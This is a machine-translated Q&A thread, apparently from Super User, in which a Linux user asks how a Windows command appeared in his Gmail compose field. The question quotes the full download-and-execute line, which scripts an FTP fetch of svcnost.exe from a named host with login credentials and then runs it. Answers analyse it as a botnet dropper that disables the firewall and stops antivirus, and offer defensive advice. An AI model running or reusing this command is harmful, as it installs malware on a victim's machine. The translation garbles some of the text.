Як визначити, чи зламався мій комп'ютер Linux?


128

Мій домашній ПК зазвичай увімкнено, але монітор вимкнено. Цього вечора я повернувся додому з роботи і виявив, що схоже на спробу злому: у моєму браузері мій Gmail був відкритий (це я), але він був у режимі компонування із наступним у TOполі:

md / c echo відкрити cCTeamFtp.yi.org 21 >> ik & echo користувача ccteam10 765824 >> ik & echo бінарний >> ik & echo отримати svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe та вихід ехо Ви отримали власність

Це виглядає як код командного рядка Windows, і mdпочаток коду в поєднанні з тим, що Gmail знаходився в режимі композиції, дає зрозуміти, що хтось намагався запустити cmdкоманду. Я здогадуюсь, що мені пощастило, що я насправді не запускаю Windows на цьому ПК, але у мене є інші. Це перший раз, коли зі мною трапилось щось подібне. Я не гуру Linux, і в той час я не запускав жодної іншої програми, окрім Firefox.

Я абсолютно впевнений, що я цього не писав, і ніхто інший не був фізично за моїм комп’ютером. Також нещодавно я змінив свій пароль Google (і всі інші мої паролі) на щось подібне, vMA8ogd7bvтому не думаю, що хтось зламав мій обліковий запис Google.

Що щойно сталося? Як хтось натискає клавіші на моєму комп’ютері, коли це не стара бабуся машина Windows, на якій вже багато років працює зловмисне програмне забезпечення, а нещодавно нова установка Ubuntu?

Оновлення:
Дозвольте мені вирішити деякі моменти та питання:

  • Я в Австрії, на селі. Мій маршрутизатор WLAN працює з WPA2 / PSK та середньо-сильним паролем, якого немає у словнику; мав би бути грубої сили і менше ніж 50 метрів звідси; ймовірно, що його зламали.
  • Я використовую USB-провідну клавіатуру, тому знову дуже малоймовірно, що хтось міг би бути в зоні дії, щоб зламати її.
  • Я не використовував комп’ютер у той час; це було простою вдома, поки я був на роботі. Це нетто-ПК на моніторі, тому я його рідко вимикаю.
  • Машині всього два місяці, працює лише Ubuntu, і я не використовую дивне програмне забезпечення або відвідую дивні сайти. Це в основному Stack Exchange, Gmail та газети. Немає ігор. Ubuntu налаштований на постійне оновлення.
  • Мені не відомо, що жодна послуга VNC працює; Я, звичайно, не встановив і не ввімкнув його. Я також не запускав жодних інших серверів. Я не впевнений, що за умовчанням вони працюють у Ubuntu?
  • Я знаю всі IP-адреси в активності облікового запису Gmail. Я досить впевнений, що Google не був в'їздом.
  • Я знайшов програму перегляду файлів журналу , але не знаю, що шукати. Допомога?

Те, що я насправді хочу знати, - і що насправді змушує мене почувати себе небезпечно: як хтось із Інтернету може створювати натискання клавіш на моїй машині? Як я можу запобігти цьому, не маючи про це все цікаво? Я не прихильник Linux, я батько, який спілкувався з Windows 20+ років і мені це набридло. І за всі 18 років роботи в Інтернеті я ніколи особисто не бачив жодної спроби злому, тому це для мене нове.


4
Хтось ще мав доступ до вашого комп’ютера, чи у вас дуже стара бездротова клавіатура? Також Ubuntu має вбудований VNC-сервер. Якщо ця активність, випадковий скрипт десь міг би з'єднатись і припустив, що це комп'ютер з Windows, надсилаючи натискання клавіш WIN + R, cmd ......
TuxRug

29
@torbengb: Ваш пост мене справді лякає ...
Мехрдад

9
Чи є у вашій бездротовій мережі інші комп’ютери? Якщо зловмисник порушив їхню безпеку, це дасть йому "у" вашій локальній мережі, що може призвести до розлому вікна Ubuntu різними способами.
CarlF

4
@muntoo ... і я впевнений, що ви цього не записували ніде і не використовуєте жодного додатку для управління ними, правда? Давайте не почнемо базування паролів; принаймні мій пароль не password:-)
Torben Gundtofte-Bruun

6
У вас є кішка?
Закі

Відповіді:


66

Я сумніваюся, що вам є про що турбуватися. Це була більш ніж ймовірна атака JavaScript, яка намагалася зробити диск за допомогою завантаження . Якщо вас турбує це, почніть використовувати NoScript і AdBlock Plus Firefox надбудови.

Навіть відвідуючи надійні веб-сайти, ви не безпечні, оскільки вони запускають код JavaScript від сторонніх рекламодавців, що може бути шкідливим.

Я схопив його і побіг у ВМ. Він встановив mirc, і це журнал статусу ... http://pastebin.com/Mn85akMk

Це автоматизована атака, яка намагається змусити вас завантажити mIRC та приєднатись до ботнету, що перетворить вас на спам-файли ... Це моє VM приєдналося і зробило з'єднання з низкою різних віддалених адрес, один з яких є autoemail-119.west320.com.

Запускаючи його в Windows 7, я повинен був прийняти підказку UAC та дозволити йому доступ через брандмауер.

Здається, є багато повідомлень про цю точну команду на інших форумах, і хтось навіть каже, що торрент-файл намагався виконати його, коли він закінчував завантаження ... Я не впевнений, як це можливо.

Я сам не користувався цим, але він повинен мати можливість показувати вам поточні мережеві з'єднання, щоб ви могли бачити, чи підключено ви щось із норми: http://netactview.sourceforge.net/download.html


10
Е, чому всі коментарі (навіть дуже вкрай відповідні , які виявили, що сценарій намагався відкрити cmdвікно) були видалені !?
BlueRaja - Danny Pflughoeft

Чи був би я такий же захищений від подібної атаки, якби я тільки почав використовувати uBlock Origin?
RobotUnderscore

42

Я погоджуюся з @ jb48394, що це, мабуть, експлуатація JavaScript, як і все інше в ці дні.

Той факт, що він намагався відкрити cmdвікно (див. Коментар @ torbengb ) та виконати зловмисну ​​команду, а не просто стримувати троянський диск у фоновому режимі, говорить про те, що він використовує деяку вразливість у Firefox, яка дозволяє йому вводити натискання клавіш, але не запустити код.

Це також пояснює, чому цей подвиг, чітко написаний виключно для Windows, також працював би в Linux: Firefox працює так само, як JavaScript у всіх операційних системах (принаймні, це намагається :)) . Якби це було викликано переповненням буфера або подібним експлуатуванням, призначеним для Windows, воно б просто розбило програму.

Щодо того, звідки взявся код JavaScript - можливо, це шкідливе оголошення Google (цикл оголошень у Gmail протягом дня) . Це не було б першого час .


4
Приємні посилання.
kizzx2

9
FYI для скиммерів, остання "посилання" - це насправді п'ять окремих посилань.
Попс

Це було б дуже шокуюче, якщо це дійсно експлуатування Javascript, оскільки мій Firefox зазвичай залишається відкритим цілими днями. Однак вам потрібно викликати спеціальний API, щоб надіслати ключі до іншої системи під Windows та, ймовірно, іншого системного виклику (якщо він існує) під Linux. Оскільки надсилання натискань клавіш не є звичайною операцією Javascript, я сумніваюся, що Firefox здійснить крос-платформний виклик для цього.
billc.cn

1
@ billc.cn: Я вважаю, що запис у буфер клавіатури PS / 2 працює однаково, незалежно від операційної системи .
BlueRaja - Danny Pflughoeft

12

Я виявив подібну атаку на іншій машині Linux. Здається, це якась команда FTP для Windows.


8
Точніше, він завантажує та запускає файл ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exeза допомогою інструмента ftpкомандного рядка Windows .
grawity

знайшов це на pastebin занадто pastebin.com/FXwRpKH4
Shekhar

тут інформація про сайт whois.domaintools.com/216.210.179.67
Шехар

9
Це пакет WinRAR SFX, який містить портативну установку mIRC та файл під назвою "DriverUpdate.exe." DriverUpdate.exe виконує (принаймні) дві команди оболонки: встановлення брандмауера відключення opmode і відключення завдання / F / IM VCSPAWN.EXE / T Також він намагається (я думаю) додати die-freesms-seite.com до довіреної зони Internet Explorer і проксі-сервер.
Ендрю Ламберт

5

Це не відповідає на все ваше запитання, але у файлі журналу шукайте невдалі спроби входу.

Якщо у вашому журналі більше ніж п'ять невдалих спроб, то хтось намагався зламати root. Якщо у вас є успішна спроба входу, rootпоки ви були далеко від комп'ютера, ЗМІНУЙТЕ ЗМІНУЙТЕ ПАРОЛЬНЕ СЛОВО !! Я маю на увазі ПРАВО ЗАРАЗ! Переважно щось алфавітно-цифрове і приблизно 10 символів.

З отриманими вами повідомленнями ( echoкомандами) це справді звучить як якийсь незрілий малюк сценарію . Якби це справжній хакер, який знає, що він робить, ви, мабуть, досі не знали б про це.


2
Я згоден, це, очевидно, дуже любительсько. Принаймні, вони не повинні були ставити ехо, яким ви володіли наприкінці. Змушує мене замислитися, чи не потрапляли будь-які "справжні хакери"? Чи справді я повинен запитати, скільки?
Torben Gundtofte-Bruun

1
@torgengb: якби команда виконувалась у командному рядку Windows, ти не побачив би відлуння (через те &exit)
BlueRaja - Danny Pflughoeft

-1

whois звіти west320.com належить Microsoft.

UPnP та Vino (Система -> Налаштування -> Віддалений робочий стіл) у поєднанні зі слабким паролем Ubuntu?

Чи використовували ви нестандартні сховища?

DEF CON щороку проводить конкуренцію Wi-Fi щодо того, як далеко можна дістатися до точки доступу до Wi-Fi - останнє, що я чув, це було 250 миль.

Якщо ви дійсно хочете, щоб вас налякали, подивіться на скріншоти командно-n-центру управління ботнету Zeus . Жодна машина не є безпечною, але Firefox у Linux безпечніший за решту. Ще краще, якщо ви запускаєте SELinux .


1
Автор цього подвигу явно не мав наміру запускати це в Linux, тому я сумніваюся, що це було пов'язане з уразливою утилітою gnome або слабким паролем (також, ОП вже згадував, що він має захищений пароль)
BlueRaja - Danny Pflughoeft

Насправді він не згадує наявність пароля Ubuntu, просто gmail та бездротову парольну фразу. Малюк, який працює з метасплайтом, може навіть не знати про Linux, він просто бачить VNC. Це, швидше за все, атака Javascript.
rjt
Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.